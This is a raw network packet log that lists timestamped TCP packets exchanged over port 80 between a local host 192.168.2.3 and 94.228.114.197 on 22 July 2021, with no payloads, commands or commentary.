Jul 22, 2021 11:28:04.865175009 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865183115 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865215063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865252972 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865288019 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865326881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865359068 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865365028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865411997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865456104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865427971 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865493059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865530968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865569115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865606070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865614891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865643978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865716934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865717888 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865763903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865807056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865816116 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865827084 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865834951 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865843058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865883112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865909100 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865920067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865956068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865993977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866009951 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866030931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866077900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866077900 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866151094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866154909 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866189957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866189957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866230011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866260052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866307020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866326094 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866369009 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866394997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866431952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866441011 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866480112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866523027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866525888 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866559982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866597891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866615057 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866636038 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866672993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866689920 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866713047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866750956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866770029 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866799116 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866839886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866857052 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866878033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866915941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866920948 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.866955042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866991043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.866993904 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867028952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867046118 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867067099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867136002 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867141962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867194891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867233992 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867235899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867273092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867311001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867316961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867348909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867383957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867404938 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867422104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867459059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867465973 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867506981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867547989 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867548943 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867584944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867607117 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867624044 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867661953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867700100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867714882 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867737055 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867774963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867815971 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867820978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867862940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867867947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867898941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867937088 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.867953062 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.867974997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868010998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868047953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868048906 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868084908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868107080 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868132114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868172884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868199110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868210077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868247986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868284941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868299961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868320942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868359089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868365049 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868396044 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868432045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868443012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868484020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868499994 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868521929 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868558884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868596077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868612051 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868632078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868669033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868693113 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868707895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868753910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868765116 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868796110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868833065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868855000 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868870020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868908882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868915081 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.868951082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.868988037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.869146109 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.869172096 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.869493961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.869533062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.869617939 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.869705915 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.949903965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.949970961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950005054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950035095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950073004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950110912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950148106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950192928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950242043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950279951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950318098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950340033 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.950356007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950396061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950404882 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.950433016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950479984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950521946 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950562954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950572014 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.950587988 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.950601101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950638056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950664997 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.950692892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950723886 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.950731039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950767994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950789928 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.950814962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950856924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950885057 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.950895071 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950937986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950974941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.950984001 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951010942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951050043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951086998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951172113 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951189995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951230049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951267958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951282978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951304913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951351881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951354027 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951394081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951412916 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951431036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951468945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951505899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951509953 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951540947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951579094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951592922 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951615095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951661110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951662064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951705933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951721907 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951742887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951781034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951817989 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951822042 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951854944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951891899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951909065 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.951929092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951976061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.951977015 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952017069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952043056 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952054024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952091932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952128887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952132940 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952164888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952203035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952214956 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952239990 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952282906 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952286959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952328920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952344894 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952366114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952404022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952436924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952441931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952478886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952514887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952523947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952553034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952599049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952601910 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952640057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952677011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952677965 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952717066 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952732086 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952754021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952790976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952822924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952827930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952866077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952908039 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952914953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.952970028 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.952971935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953008890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953047037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953054905 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953084946 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953121901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953150988 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953161001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953197956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953211069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953244925 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953282118 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953286886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953322887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953361034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953398943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953401089 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953434944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953473091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953486919 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953510046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953552961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953556061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953598022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953614950 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953634024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953671932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953710079 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953711033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953747034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953783989 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953794956 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953823090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953870058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953871965 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953911066 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.953958035 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.953963041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954013109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954018116 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954054117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954091072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954102993 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954128981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954166889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954183102 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954202890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954241037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954246998 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954277992 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954314947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954324961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954366922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954402924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954437017 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954442024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954480886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954518080 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954534054 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954555035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954592943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954608917 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954639912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.954685926 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.954741001 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.970376968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.971015930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.034390926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034430981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034466028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034501076 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034543037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034581900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034584999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.034615993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034651995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034686089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.034710884 CEST	49720	80	192.168.2.3	94.228.114.197
